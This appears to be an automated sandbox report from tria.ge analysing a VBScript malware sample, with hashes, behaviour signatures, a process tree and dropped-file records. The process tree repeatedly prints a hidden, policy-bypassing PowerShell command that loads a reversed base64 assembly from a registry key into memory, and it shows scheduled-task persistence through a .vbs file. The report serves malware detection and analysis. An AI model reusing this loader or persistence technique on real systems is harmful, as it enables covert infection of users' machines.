Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
28s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
11/03/2025, 19:16
Static task
static1
Behavioral task
behavioral1
Sample
ovQc.vbe
Resource
win7-20240729-en
General
-
Target
ovQc.vbe
-
Size
10KB
-
MD5
ba104bdc908f978aaa1c4bdc39a3553a
-
SHA1
b1d0111c23c09f659fc9993ff5d1304c06ed5ba1
-
SHA256
2bfd3a4cf58b0bc16b1af17eba113dbd58d00d7b199634d08428126f79e2bf9c
-
SHA512
236b6666b7a3a994f519c6ba2f77a358c23d430d34300dbf2c948b121199f3094b7ce3a3060b32d46dd2d272b610fb5c1621530f7917fb775195594c3ef82b9b
-
SSDEEP
96:Lh31q9lqKylGu47UgHw63nw7ZAy6e3GowTC0qaXSZM6fiEoqDzG3gYBl/U4QlI+K:Lh1q9lqKy8wcnsay6eoeAaMZqfOHTSdK
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 2324 WScript.exe 3 2324 WScript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs
Run Powershell and hide display window.
pid Process 3048 powershell.exe 1044 powershell.exe 2808 powershell.exe 2452 powershell.exe 924 powershell.exe 2436 powershell.exe 2376 powershell.exe 1304 powershell.exe 2440 powershell.exe 1960 powershell.exe 2052 powershell.exe 2612 powershell.exe 572 powershell.exe -
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2436 powershell.exe 2376 powershell.exe 1304 powershell.exe 572 powershell.exe 3048 powershell.exe 1044 powershell.exe 2440 powershell.exe 1960 powershell.exe 2808 powershell.exe 2452 powershell.exe 2612 powershell.exe 924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 1304 powershell.exe Token: SeDebugPrivilege 572 powershell.exe Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 1044 powershell.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeDebugPrivilege 1960 powershell.exe Token: SeDebugPrivilege 2808 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 2612 powershell.exe Token: SeDebugPrivilege 924 powershell.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 2324 wrote to memory of 2436 2324 WScript.exe 30 PID 2324 wrote to memory of 2436 2324 WScript.exe 30 PID 2324 wrote to memory of 2436 2324 WScript.exe 30 PID 2132 wrote to memory of 2168 2132 taskeng.exe 33 PID 2132 wrote to memory of 2168 2132 taskeng.exe 33 PID 2132 wrote to memory of 2168 2132 taskeng.exe 33 PID 2168 wrote to memory of 2376 2168 WScript.exe 35 PID 2168 wrote to memory of 2376 2168 WScript.exe 35 PID 2168 wrote to memory of 2376 2168 WScript.exe 35 PID 2168 wrote to memory of 1304 2168 WScript.exe 37 PID 2168 wrote to memory of 1304 2168 WScript.exe 37 PID 2168 wrote to memory of 1304 2168 WScript.exe 37 PID 2168 wrote to memory of 572 2168 WScript.exe 39 PID 2168 wrote to memory of 572 2168 WScript.exe 39 PID 2168 wrote to memory of 572 2168 WScript.exe 39 PID 2168 wrote to memory of 3048 2168 WScript.exe 41 PID 2168 wrote to memory of 3048 2168 WScript.exe 41 PID 2168 wrote to memory of 3048 2168 WScript.exe 41 PID 2168 wrote to memory of 1044 2168 WScript.exe 43 PID 2168 wrote to memory of 1044 2168 WScript.exe 43 PID 2168 wrote to memory of 1044 2168 WScript.exe 43 PID 2168 wrote to memory of 2440 2168 WScript.exe 45 PID 2168 wrote to memory of 2440 2168 WScript.exe 45 PID 2168 wrote to memory of 2440 2168 WScript.exe 45 PID 2168 wrote to memory of 1960 2168 WScript.exe 47 PID 2168 wrote to memory of 1960 2168 WScript.exe 47 PID 2168 wrote to memory of 1960 2168 WScript.exe 47 PID 2168 wrote to memory of 2808 2168 WScript.exe 49 PID 2168 wrote to memory of 2808 2168 WScript.exe 49 PID 2168 wrote to memory of 2808 2168 WScript.exe 49 PID 2168 wrote to memory of 2052 2168 WScript.exe 51 PID 2168 wrote to memory of 2052 2168 WScript.exe 51 PID 2168 wrote to memory of 2052 2168 WScript.exe 51 PID 2168 wrote to memory of 2452 2168 WScript.exe 53 PID 2168 wrote to memory of 2452 2168 WScript.exe 53 PID 2168 wrote to memory of 2452 2168 WScript.exe 53 PID 2168 wrote to memory of 2612 2168 WScript.exe 55 PID 2168 wrote to memory of 2612 2168 WScript.exe 55 PID 2168 wrote to memory of 2612 2168 WScript.exe 55 PID 2168 wrote to memory of 924 2168 WScript.exe 57 PID 2168 wrote to memory of 924 2168 WScript.exe 57 PID 2168 wrote to memory of 924 2168 WScript.exe 57 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ovQc.vbe"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9461EC26-5943-456B-930A-2C29F4AC6F9C} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ifGtcQfISxddcGn.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
PID:2052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b2848a42adb72efb55f1873d8b8287d2
SHA1a8c06d667d2d52664c9989f00eecca44229de0be
SHA2569d1483a93d843b296b661bb20cc989b46fc05d30c6a8eb8a1c914a6e4a3fb626
SHA512faa46d76526d696ac4ddc187aeb75f04bb3ea9aded34f61b190ba368a35ee9191aa172c88942949134ebfef44b5fe69d5d68483fd8b5bfbae3bd6998e2328d1f
-
Filesize
2KB
MD5ae38697351c86c7aed1711c9edc478af
SHA1fc723672262fb8d6e5020a14e39b47a25d35aa5f
SHA256f400644bd84a139f46d9aa7e315012ec04efe0ce966a434bd479a28155bee5af
SHA512fbe8b492c5191e7bfe7b44c7ac00fdbcb46c9c39b28000a3d57122533bdf994109119831defc8403d74fdc84551c13b476c01275b68487cda05f9ad54b1fbd82